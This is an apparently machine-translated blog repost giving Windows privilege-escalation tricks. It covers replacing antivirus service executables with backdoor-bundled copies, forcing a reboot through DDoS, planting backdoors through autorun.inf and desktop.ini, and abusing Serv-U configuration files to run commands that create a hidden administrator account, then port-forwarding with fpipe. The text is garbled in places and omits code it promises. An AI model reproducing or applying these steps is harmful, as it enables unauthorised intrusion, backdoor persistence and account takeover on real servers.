2. Tech
  3. Lifting of authority

Lifting of authority

xiaoxiao2021-03-06  102

Replace system service.

This is a trick that the majority of black friends is not tired. Because Windows allows you to change the program being running, we can replace his service to automatically run our back door or Trojan after restart! First, through the shell input you get: Net Start command, check the service he run. At this time, if you are familiar with Windows system services, you can quickly see which services can be used.

C: / Winnt / System32 /> NET Start has launched the following Windows services:

COM Event System Cryptographic Services DHCP Client Distributed Link Tracking Client DNS Client Event Log Help and Support IPSEC Services Logical Disk Manager Logical Disk Manager Administrative Servic Network Connections Network Location Awareness (NLA) Protected Storage Remote Procedure Call (RPC) Rising Process Communication Center Rising Realtime Monitor Service Secondary Logon Security Accounts Manager Shell Hardware Detection System Event Notification System Restore Service Telephony Themes Upload Manager WebClient Windows Audio Windows Image Acquisition (WIA) Windows Management Instrumentation Windows Time Wireless Zero Configuration Workstation

The command successfully completed.

I first run a command on my machine to do a demonstration (everyone else black me), pay attention to the part of my red label, that is the Rising I installed. The Rising Process Communication Center call is CCenter.exe, and the Rising Realtime Monitor Service service calls RavMond.exe. These are third-party services, which can be used. (Strongly recommended to replace third-party services, do not mess with system services, otherwise the system is unstable) so that we search these two files, found them in the D: / Rising / RAV / folder, pay attention to a point: if This file is in the Program files directory of the system disk, we have to know if the other party is using the hard disk used by the NTFS format, then this folder guest permission under the system is not writable by default, and Windows Directory, Documents and These settings directories are not writable, so we can't replace files and can only make the way. (This is also one of the reasons why I don't recommend replacing the system service, because the system service file is in the Windows / System32 directory, not writable), but if it is FAT32 format, you don't have to worry, because it is insufficient, all folders are written.

So someone will ask: If we are NTFS format, are we not?

Of course, the NTFS format is default, except for the three folders, the rest of the folder, the partition is EVERYONE fully controlled. (That is to say, even if IPC $ anonymous connections, I have writable can be written to these places!) So once the other party's third-party service is not installed in that three folders, we can replace it! I will take CCenter to download it to the local machine (FTP, put it in the IIS home directory and then download, etc. ...) then take your file bundle machine, find a back door of your most hand ... huh, After the bundle is tied, upload, first change the other CCenter.exe file to cCentBak.exe, and then replace itself into its own ccenter. Now just need to wait for the other machine to restart, our latter can run! Since the Windows system is unstable, the host will restart after a week, (Of course, if you can't wait, you can do DDoS attack on this server forced him to restart, but I don't agree!) Mount your back door at this time. Is SYSTEM permissions! 5, replace the Admin common program.

If the other party does not have the service you can use, you can replace the program commonly used by the other party administrator, such as QQ, MSN, etc. .

6, using autorun .inf or desktop.ini.

We will often encounter this kind of thing: the disc is placed in the optical drive, and it will automatically jump out of a Flash. Why? Oh, you go to the root directory of the CD, do you have an autorun.inf file? Take a look at the notepad, do you have such a sentence: autorun = xxx.exe This is the automatic running program you just saw.

So we can use this to enhance our permissions. First configure a back door, (I often use Winshell, of course, you don't have to use this also) to upload any folder under his D, then upload the autorun.inf file from your own CD, However, you will change the XXX.exe next to Autorun = XXX.exe to the back door file, file name, and then upload it to the D drive root directory, plus read only, system, hide properties. OK will wait for the other party admin to browse D disk, our latter can start! (Of course, this must be only available in the case where he has no automatic operation.)

There is also the same role is Desktop.ini. Everyone knows Windows supports custom files, in fact it is implemented by writing specific files in the folder - DESKTOP.INI and Folder.htt, we can use the modified file to achieve our goal.

First, we now create a folder locally, the name is not important, enter it, right click on the blank point, select "Custom Folder" (XP seems to be not possible), it will be separated. Once you have finished, you will see more than two files named Folder Setting files and Desktop.ini files in this directory, (if you can't see, unwind "hidden protected operating system files") We found Folder.htt files in the Folder Setting directory, and notepad open, add the following code to anywhere:

then you put your back door file in the Folder Setting directory, Upload this directory with Desktop.ini to any of the other directory, you can, just ask the administrator to browse this directory, it has implemented our back door! (If you don't worry, you can set a few directory more)

7, Serv-U upgrade permissions

There are three ways to use Serv-U improved permissions, and overflow is the first, I have said before, it will not be introduced here. What I want to talk about is the rest of the two.

Measures 1: Requirements: There is full control over the SERV-U installation directory.

Method: Enter the other party's serv-u directory, look at his servudaemon.ini, which is the Serv-U configuration file. If the administrator does not choose to write the Serv- U of all configurations to the registry, we can come from this file. See all information, versions, IPs, and even user names and passwords in Serv-U! The password of the earlier version is not encrypted, but later it has passed MD5 encryption. So you can't get your password directly. However, we still have a way: first install a serv-u (the best new point) locally, cover your own servudaemon.ini file with the servudaemon.ini downloaded from his download, restart SERV-U, So all the configurations above is exactly the same as him. We create a new user, what group is not important, it is important to change his home directory to the other party's system disk, and then add execution permission! This is the most important. After the change is applied, exit. Upload the servudaemon.ini file you changed, overwrite his file, and then wait for his SERV-U restart update configuration, then we can log in to his FTP. After entering, execute the following command:

CD Windows CD System32 Quote Site Exec Net.exe User WOFEIWO / Add Quote Site Exec Net.exe Localgroup Administrators WOFEIWO / Add BYE

Then you have a system administrator called WOFEIWO, what are you waiting for? Log in to 3389, don't know!

Method 2: SERV-U opened two ports, one is 21, which is ftp, and the other is 43958, what is this port? Hey, this is the local management port of Serv-U. But by default, it is not allowed to use an IP connection outside 127.0.0.1. At this time, you will use the fpipe.exe file. This is a port forwarder, upload him, execute the command:

Fpipe -V -L 3333 -R 43958 127.0.0.1

It means to map 4444 ports to 43958 ports.

转载请注明原文地址:https://www.9cbs.com/read-99475.html

9cbs

New Post(0)
CopyRight © 2020 All Rights Reserved
Processed: 0.045, SQL: 9